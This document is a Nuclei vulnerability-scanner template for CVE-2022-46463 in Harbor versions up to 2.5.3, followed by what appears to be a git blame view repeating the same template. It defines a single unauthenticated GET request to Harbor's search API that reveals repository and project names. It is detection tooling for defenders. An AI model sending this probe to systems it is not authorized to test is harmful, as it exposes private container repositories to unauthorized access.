nuclei-templates/http/cves/2022/CVE-2022-46463.yaml

id: CVE-2022-46463

info:
  name: Harbor <=2.5.3 - Unauthorized Access
  author: Arm!tage
  severity: high
  description: An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. 
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46463
  metadata:
    max-request: 1
    vendor: linuxfoundation
    product: harbor
  tags: cve,cve2022,intrusive,harbor

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/v2.0/search?q=/'


    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - 'repository_name'
          - 'project_name'
        condition: and

      - type: status
        status:
          - 200
add cve-2022-46463.yaml 2023-08-16 08:46:20 +00:00			`id: CVE-2022-46463`

			`info:`
			`name: Harbor <=2.5.3 - Unauthorized Access`
			`author: Arm!tage`
			`severity: high`
			`description: An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication.`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-46463`
			`metadata:`
			`max-request: 1`
			`vendor: linuxfoundation`
			`product: harbor`
			`tags: cve,cve2022,intrusive,harbor`

			`http:`
			`- method: GET`
			`path:`
add cve-2022-46463 2023-08-16 08:57:23 +00:00			`- '{{BaseURL}}/api/v2.0/search?q=/'`
add cve-2022-46463.yaml 2023-08-16 08:46:20 +00:00

			`matchers-condition: and`
			`matchers:`
			`- type: word`
add cve-2022-46463 2023-08-16 08:57:23 +00:00			`part: response`
add cve-2022-46463.yaml 2023-08-16 08:46:20 +00:00			`words:`
add cve-2022-46463 2023-08-16 08:57:23 +00:00			`- 'repository_name'`
			`- 'project_name'`
			`condition: and`
add cve-2022-46463.yaml 2023-08-16 08:46:20 +00:00
			`- type: status`
			`status:`
add cve-2022-46463 2023-08-16 08:57:23 +00:00			`- 200`